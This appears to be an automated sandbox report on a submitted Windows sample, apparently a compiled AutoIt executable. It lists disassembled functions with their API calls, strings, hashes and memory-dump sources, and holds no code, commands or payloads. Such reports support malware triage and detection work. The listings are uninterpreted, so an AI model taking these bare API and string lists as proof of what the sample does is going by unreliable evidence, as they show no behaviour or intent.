Opcode Fuzzy Hash: 07c4a13554d5c04062e71a3d0a9688f6684deb449f366b94091308e14c95cba0
Instruction Fuzzy Hash: 2891AB756042119FD720DF25D888F1ABBE1AF84318F1485A9E46A9B7A3C738ED41CFE1

Function 00728CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00728CF3

Part of subcall function 00708E54: _wcslen.LIBCMT ref: 00708E77

_wcslen.LIBCMT ref: 00728D4E
_wcslen.LIBCMT ref: 00728D9C
_wcslen.LIBCMT ref: 00728DDC
_wcslen.LIBCMT ref: 00728E6E

Strings

stdcall, xrefs: 00728DD6, 00728DDB
none, xrefs: 00728E65, 00728E6A
winapi, xrefs: 00728D96, 00728D9B
cdecl, xrefs: 00728D48, 00728D4D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 5cf2bd6e4291b35dc4a5bb5f31b0cb40c7a06f1654f658d833f54374f873d2f4
Instruction ID: 06872e39c8b8560d81ce58ebde4335d04ce5b39d2afb3e38ba6e2608555a47fe
Opcode Fuzzy Hash: 5cf2bd6e4291b35dc4a5bb5f31b0cb40c7a06f1654f658d833f54374f873d2f4
Instruction Fuzzy Hash: 8551E331A010269BCF54DF68D8409BEB3A6BF64320B21422DE826E72C4DF3ADE40C7D1

Function 0072372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00723774
CoUninitialize.OLE32 ref: 0072377F
CoCreateInstance.OLE32(?,00000000,00000017,0073FB78,?), ref: 007237D9
IIDFromString.OLE32(?,?), ref: 0072384C
VariantInit.OLEAUT32(?), ref: 007238E4
VariantClear.OLEAUT32(?), ref: 00723936

Strings

NULL Pointer assignment, xrefs: 0072381E
Invalid parameter, xrefs: 00723865
Failed to create object, xrefs: 007237E4, 0072389A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: e184188807775f935faddb8ed534a2b4d80d5e057c6b105a34c638bc95bb82bd
Instruction ID: 1f140a66f901ba3adf75d22ea42fe651205d546bb1909c302e517c8908270e66
Opcode Fuzzy Hash: e184188807775f935faddb8ed534a2b4d80d5e057c6b105a34c638bc95bb82bd
Instruction Fuzzy Hash: A361C0B0608311AFD711DF64D888B5AB7E4EF45715F00490DF9859B291C778EE88CBA6

Function 00738B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

Part of subcall function 006B912D: GetCursorPos.USER32(?), ref: 006B9141
Part of subcall function 006B912D: ScreenToClient.USER32(00000000,?), ref: 006B915E
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000001), ref: 006B9183
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000002), ref: 006B919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00738B6B
ImageList_EndDrag.COMCTL32 ref: 00738B71
ReleaseCapture.USER32 ref: 00738B77
SetWindowTextW.USER32(?,00000000), ref: 00738C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00738C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00738CFF

Strings

p#w, xrefs: 00738C71
@GUI_DRAGFILE, xrefs: 00738C9A
@GUI_DROPID, xrefs: 00738C51

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$p#w
API String ID: 1924731296-3001469106
Opcode ID: 0c16ccef334ebce082475deef62a1ee0544b9f593a66ddb04fb9af347928bf60
Instruction ID: b5341687aa79529d9299e683c6b4ef86a06adf6ec78cb8b5453c9d2208f437eb
Opcode Fuzzy Hash: 0c16ccef334ebce082475deef62a1ee0544b9f593a66ddb04fb9af347928bf60
Instruction Fuzzy Hash: DA51AB71104300AFE744EF14CC56FAA77E5FB88754F500A2DF956672A2CB38AD44CB66

Function 00713388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007133CF

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007133F0

Strings

Error: , xrefs: 007134D1
^ ERROR , xrefs: 0071349E
Line %d (File "%s"):, xrefs: 00713443, 0071345C
"%s" (%d) : ==> %s:, xrefs: 00713522
"%s" (%d) : ==> %s:%s%s, xrefs: 00713504
Incorrect parameters to object property !, xrefs: 007134AB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 591a4aed6333f18a62e87e372f139200328fa596da079aac38c48ae8216c4f2d
Instruction ID: ed6d138c3b4ab56edce7148075b5cc6fdc3ab87c445aefb6642113da85adfdf2
Opcode Fuzzy Hash: 591a4aed6333f18a62e87e372f139200328fa596da079aac38c48ae8216c4f2d
Instruction Fuzzy Hash: 5F51B171900219AADF15FBE4CD46EEEB77AAF05340F208169F50572192EB392F98CF64

Function 0070B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0070B5FC
_wcslen.LIBCMT ref: 0070B608
_wcslen.LIBCMT ref: 0070B64D
_wcslen.LIBCMT ref: 0070B68C
_wcslen.LIBCMT ref: 0070B6C7

Strings

APPEND, xrefs: 0070B6C1, 0070B6C6
KEYS, xrefs: 0070B647, 0070B64C
REMOVE, xrefs: 0070B602, 0070B607
EXISTS, xrefs: 0070B686, 0070B68B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: fc40188086dcc1cd9922ce4b2d55b2b762788f66d9d80785cc3666b0a53e2a3e
Instruction ID: 89ca35bd5fff78b5340541af568d081aafcf514b034fa57b8bdb6bd6253d5a7f
Opcode Fuzzy Hash: fc40188086dcc1cd9922ce4b2d55b2b762788f66d9d80785cc3666b0a53e2a3e
Instruction Fuzzy Hash: B341B832A00127DBCB109F7DC9905BE77E5AFA1754B244329E421D72C4E73ADE81C790

Function 00715393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007153A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00715416
GetLastError.KERNEL32 ref: 00715420
SetErrorMode.KERNEL32(00000000,READY), ref: 007154A7

Strings

NOTREADY, xrefs: 0071544B
INVALID, xrefs: 00715459
READY, xrefs: 00715460, 00715468
UNKNOWN, xrefs: 00715444
READONLY, xrefs: 00715452

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 748bff583db323e255dc96ee28856e78d7bc5826458d5af7398b0d8833eee2b1
Instruction ID: 93bb8d85a1fdda8415c42295477e62a0b07ed1eb83275ca903575777937c4282
Opcode Fuzzy Hash: 748bff583db323e255dc96ee28856e78d7bc5826458d5af7398b0d8833eee2b1
Instruction Fuzzy Hash: 74319175A00544DFDB15DF6CC484AEABBB4EB85305F148069E806DB292DB79DDC2CB90

Function 00733A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00733A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00733AA0
GetWindowLongW.USER32(?,000000F0), ref: 00733AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00733AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00733B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00733BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00733BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00733BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00733BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00733C13

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: b40c9b3d6230b53eaee41c653c4d98b7ef231eccf5d3bd65ba042a6881c4ea3c
Instruction ID: a11150e97f13d5b5dbf2ffd50b4b9c74b9a5fdb52fdac4bcf2b3625e6eb90e94
Opcode Fuzzy Hash: b40c9b3d6230b53eaee41c653c4d98b7ef231eccf5d3bd65ba042a6881c4ea3c
Instruction Fuzzy Hash: 79617D75900248AFEB20DF68CC81EEE77F8EB09710F104199FA15A7292C778AE41DF64

Function 0070B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0070B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B165
GetWindowThreadProcessId.USER32(00000000), ref: 0070B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0070B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0070A1E1,?,00000001), ref: 0070B21D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: c19b095c3c2776c4a2e917dd6e60a45c120aa0caea465f94d01a01952b147986
Instruction ID: a32f9a9979e26fdb766e5fdf216458563967755f0b1c92a65465791a6d0bed34
Opcode Fuzzy Hash: c19b095c3c2776c4a2e917dd6e60a45c120aa0caea465f94d01a01952b147986
Instruction Fuzzy Hash: 9A318F71500204FFEB119F64DD49B6D7BAABB61352F108505FA05DA290D7BC9A80CF68

Function 006D2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006D2C94

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006D2CA0
_free.LIBCMT ref: 006D2CAB
_free.LIBCMT ref: 006D2CB6
_free.LIBCMT ref: 006D2CC1
_free.LIBCMT ref: 006D2CCC
_free.LIBCMT ref: 006D2CD7
_free.LIBCMT ref: 006D2CE2
_free.LIBCMT ref: 006D2CED
_free.LIBCMT ref: 006D2CFB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 91aeb876b91b726c453f3214f33234a4221cc2fbec9301540820de16c16316fa
Instruction ID: 5015f72caaf0c024dd6eaedebfbea3f59ebfa463672c92ce45f735d2a507113b
Opcode Fuzzy Hash: 91aeb876b91b726c453f3214f33234a4221cc2fbec9301540820de16c16316fa
Instruction Fuzzy Hash: 75111936900009BFCB42EF55D862CDC3BA6FF15740F4140AAF9485F322D631EE50AB94

Function 006A1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006A1459
OleUninitialize.OLE32(?,00000000), ref: 006A14F8
UnregisterHotKey.USER32(?), ref: 006A16DD
DestroyWindow.USER32(?), ref: 006E24B9
FreeLibrary.KERNEL32(?), ref: 006E251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 006E254B

Strings

close all, xrefs: 006A1454

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 9d946d809d1211506e8630a79fb340ce3aa6403ca50c0cd5666e66f4e874af28
Instruction ID: 0fcc1a91ba823b494cf5f5161e218398c3f9b054f3a7a19969b702c6af3bbf1b
Opcode Fuzzy Hash: 9d946d809d1211506e8630a79fb340ce3aa6403ca50c0cd5666e66f4e874af28
Instruction Fuzzy Hash: 05D18E71702222CFDB19EF15C9A9A69F7A7BF06700F1442ADE44AAB251CB30ED52CF54

Function 006A5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 006A5C7A

Part of subcall function 006A5D0A: GetClientRect.USER32(?,?), ref: 006A5D30
Part of subcall function 006A5D0A: GetWindowRect.USER32(?,?), ref: 006A5D71
Part of subcall function 006A5D0A: ScreenToClient.USER32(?,?), ref: 006A5D99

GetDC.USER32 ref: 006E46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006E4708
SelectObject.GDI32(00000000,00000000), ref: 006E4716
SelectObject.GDI32(00000000,00000000), ref: 006E472B
ReleaseDC.USER32(?,00000000), ref: 006E4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006E47C4

Strings

U, xrefs: 006E4693

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 512fbc915a7322a96d65c21b812269f718e23596ff8565475da9bf4ab28a92d7
Instruction ID: c22b05684d697f7fe04141d7f5569891b7ff2ede4b07c546cf9655bea53542b1
Opcode Fuzzy Hash: 512fbc915a7322a96d65c21b812269f718e23596ff8565475da9bf4ab28a92d7
Instruction Fuzzy Hash: 9B71CD30401345DFCF21DF74C984AEA7BB2FF4A361F144269E9565A2AACB319C82DF90

Function 0071359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007135E4

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

LoadStringW.USER32(00772390,?,00000FFF,?), ref: 0071360A

Strings

Error: , xrefs: 007136EF
^ ERROR, xrefs: 007136C9
Line %d (File "%s"):, xrefs: 0071366B
"%s" (%d) : ==> %s:, xrefs: 00713742
"%s" (%d) : ==> %s:%s%s, xrefs: 00713724

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 10e15a3f1b16b2f89fcf4c3589b9e25a02a5e86f6ddbe5fe4742f83b268edc87
Instruction ID: be7bf439f065b4c640ec8e08fa4edfdf51c871f74ca5afa7acb7289665bcfbd6
Opcode Fuzzy Hash: 10e15a3f1b16b2f89fcf4c3589b9e25a02a5e86f6ddbe5fe4742f83b268edc87
Instruction Fuzzy Hash: 96518FB1800219EADF15FBA4CC42EEEBB75AF05340F544129F505721A2EB392F98DFA4

Function 0071C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0071C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0071C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0071C2CA
GetLastError.KERNEL32 ref: 0071C322
SetEvent.KERNEL32(?), ref: 0071C336
InternetCloseHandle.WININET(00000000), ref: 0071C341

Strings

, xrefs: 0071C2BB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 86f8d5355da47556c05b85840b0d647799e2a4829a9f64e2ad0bbc3c5c204e5d
Instruction ID: 6559f531024e42978254b67b2c239eca9e29991b874c7bc24e16382bc1094b9b
Opcode Fuzzy Hash: 86f8d5355da47556c05b85840b0d647799e2a4829a9f64e2ad0bbc3c5c204e5d
Instruction Fuzzy Hash: 673180B1540204AFE7239FA9CC88AEB7BFCEB49744F14851DF456E2280DB38DD849B65

Function 0070989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006E3AAF,?,?,Bad directive syntax error,0073CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007098BC
LoadStringW.USER32(00000000,?,006E3AAF,?), ref: 007098C3

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00709987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 007098F1
Line %d (File "%s"):, xrefs: 0070992D
Error: , xrefs: 00709955
., xrefs: 0070996D
Line %d:, xrefs: 00709912

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: afc04908c6c40bffb50b17e4f21532f6af190008052a0b3ec2f678626d951249
Instruction ID: 644f0d99014f300660f22fb862e2a3b1ee7608d21894a3d3f5b3b8494a584c98
Opcode Fuzzy Hash: afc04908c6c40bffb50b17e4f21532f6af190008052a0b3ec2f678626d951249
Instruction Fuzzy Hash: 0721B471800229EBDF56AF90CC06EED7776FF15300F044419F515610A2EB39AA18DF64

Function 0070209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007020AB
GetClassNameW.USER32(00000000,?,00000100), ref: 007020C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0070214D

Strings

list, xrefs: 0070212F
details, xrefs: 007020FB
smallicons, xrefs: 00702115
largeicons, xrefs: 007020E1
SHELLDLL_DefView, xrefs: 007020CC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
